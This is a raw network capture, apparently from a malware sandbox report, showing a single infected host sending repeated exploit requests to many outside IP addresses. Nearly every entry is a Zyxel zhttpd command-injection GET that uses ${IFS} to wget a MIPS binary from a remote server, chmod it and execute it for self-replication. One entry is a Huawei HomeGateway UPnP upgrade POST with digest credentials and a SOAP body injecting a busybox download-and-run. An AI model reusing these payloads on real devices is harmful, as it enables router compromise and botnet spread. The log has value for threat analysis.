                                                        Jan 28, 2024 10:13:11.772877932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9349192.168.2.1453228110.140.79.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772916079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9350192.168.2.1439334142.66.78.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.772948027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9351192.168.2.1450378121.177.86.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:11.773010969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9352192.168.2.1440282163.191.177.4437215
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.735657930 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 476
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9353192.168.2.145866418.118.129.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.784869909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9354192.168.2.1436870203.100.218.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.784924984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9355192.168.2.1442020178.56.34.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.784961939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9356192.168.2.1436228180.252.49.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785000086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9357192.168.2.1449746211.154.255.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785046101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9358192.168.2.145478831.65.188.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785079002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9359192.168.2.1437864111.127.193.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785125017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9360192.168.2.1446712199.71.225.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785176039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9361192.168.2.144071238.172.251.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785216093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9362192.168.2.1445806179.146.209.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785243988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9363192.168.2.144161647.202.149.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785279036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9364192.168.2.1436730113.77.140.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785324097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9365192.168.2.1449284164.75.253.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785353899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9366192.168.2.1438284177.244.97.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785387993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9367192.168.2.144026690.123.25.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785429001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9368192.168.2.1449368217.137.60.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785475969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9369192.168.2.145728220.223.190.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785515070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9370192.168.2.143857487.110.16.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785547972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9371192.168.2.143295824.152.51.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785593987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9372192.168.2.143417050.6.1.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785633087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9373192.168.2.1453532195.172.21.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785684109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9374192.168.2.145395037.81.44.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785705090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9375192.168.2.144910077.112.198.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785741091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9376192.168.2.145716041.44.90.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785788059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9377192.168.2.1438466117.76.65.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785823107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9378192.168.2.1458072210.206.216.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785876036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9379192.168.2.143582495.72.139.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785923004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9380192.168.2.144134269.204.86.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785940886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9381192.168.2.1459660162.158.63.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.785983086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9382192.168.2.1438550141.13.252.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786021948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9383192.168.2.145752635.18.124.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786061049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9384192.168.2.14389869.136.188.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786130905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9385192.168.2.143613280.205.152.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786155939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9386192.168.2.1436326160.89.121.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786189079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9387192.168.2.1449518221.139.217.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786259890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9388192.168.2.1452022205.183.120.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786288977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9389192.168.2.143784838.131.177.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786322117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9390192.168.2.1433084166.227.38.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786360025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9391192.168.2.144842895.59.15.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786405087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9392192.168.2.14346449.200.209.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786434889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9393192.168.2.143319612.50.86.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786478996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9394192.168.2.1436802183.97.29.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786508083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9395192.168.2.143395638.126.60.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786541939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9396192.168.2.1448190108.170.204.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786570072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9397192.168.2.1436810111.195.90.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786608934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9398192.168.2.1450820143.172.42.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786659956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9399192.168.2.1460556191.70.231.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786708117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9400192.168.2.145175294.215.185.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786736012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9401192.168.2.1435262128.3.135.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786775112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9402192.168.2.145606843.63.146.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:12.786798954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9403192.168.2.1437126149.203.155.70443
                                                        TimestampBytes transferredDirectionData
